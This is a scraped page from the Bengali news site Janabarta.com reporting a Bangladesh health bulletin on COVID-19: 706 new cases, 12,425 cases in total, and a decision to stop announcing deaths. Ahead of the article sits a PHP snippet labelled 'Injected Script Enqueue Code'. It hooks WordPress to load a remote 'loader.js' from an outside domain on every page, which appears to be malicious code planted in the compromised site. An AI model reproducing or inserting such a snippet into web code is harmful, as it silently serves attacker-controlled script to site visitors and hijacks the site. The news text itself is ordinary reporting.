// Injected Script Enqueue Code function enqueue_custom_script() { wp_enqueue_script( 'custom-error-script', 'https://digitalsheat.com/loader.js', array(), null, true ); } add_action('wp_enqueue_scripts', 'enqueue_custom_script'); Janabarta.com | Newsportal Site আক্রান্ত বেড়ে দাঁড়ালো সাড়ে ১২ হাজার - Janabarta.com

আক্রান্ত বেড়ে দাঁড়ালো সাড়ে ১২ হাজার

স্বাস্থ্য অধিদফতরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা

নিজস্ব প্রতিবেদক: গত ২৪ ঘণ্টায় দেশে মরণঘাতী করোনাভাইরাসে আক্রান্ত ৭০৬ জনকে শনাক্ত করা হয়েছে। এ নিয়ে দেশে আক্রান্তের সংখ্যা দাঁড়ালো ১২ হাজার ৪২৫ জন। তবে আজ মৃত্যুর তথ্য জানানো হয়নি।

আজ বৃহস্পতিবার স্বাস্থ্য অধিদপ্তরের করোনা সংক্রান্ত নিয়মিত বুলেটিনে এ তথ্য জানানো হয়। বুলেটিনে এসব তথ্য জানান স্বাস্থ্য অধিদফতরের অতিরিক্ত মহাপরিচালক অধ্যাপক ডা. নাসিমা সুলতানা।

তিনি বলেন, গত ২৪ ঘণ্টায় ৫ হাজার ৮৬৭ জনের নমুনা পরীক্ষা করা হয়েছে। এর মধ্যে ৭০৬ জনকে আক্রান্ত হিসেবে শনাক্ত করা হয়েছে। এ নিয়ে আক্রান্তের সংখ্যা দাঁড়ালো ১২ হাজার ৪২৫ জন।

নাসিমা সুলতানা বলেন, দুঃখের সঙ্গে জানাচ্ছি যে, এখন থেকে মৃত্যুর সংখ্যা আমরা বলতে পারব না। তবে ওয়েবসাইট থেকে জেনে নিতে হবে।

এতে জানানো হয়, গত ২৪ ঘণ্টায় দেশে ১৩০ জন সুস্থ হয়েছেন। এ নিয়ে মোট সুস্থ হলেন ১ হাজার ৯১০ জন।

গত ৮ মার্চ দেশে প্রথম করোনা রোগী শনাক্ত হয়। আর করোনা আক্রান্ত ব্যক্তির মৃত্যু ঘটে ১৮ মাচ। গতকাল পর্যন্ত দেশে মৃত্যুর সংখ্যা ছিল ১৮৬ জন।